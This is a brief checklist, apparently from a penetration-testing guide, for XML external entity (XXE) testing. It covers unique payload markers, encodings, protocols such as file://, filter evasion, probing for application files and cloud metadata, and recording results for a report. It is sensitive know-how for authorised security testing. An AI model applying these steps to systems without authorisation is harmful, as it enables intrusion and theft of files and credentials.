☐ Use unique markers in payloads (e.g., xxe_test_12345)
☐ Test with various encodings (UTF-8, UTF-16)
☐ Try different protocols (file://, http://, ftp://)
☐ Test filter evasion only if initial payloads blocked
☐ Never test DoS without explicit permission
Platform-Specific:
☐ Identify target OS from error messages/responses
☐ Use appropriate path separators (/ vs \)
☐ Test both absolute and relative paths
☐ Try common application-specific files
☐ Check for cloud metadata access
Documentation:
☐ Record all tested payloads
☐ Note which payloads worked
☐ Document parser behavior
☐ Save proof-of-concept for report
☐ Note any unusual responses or errors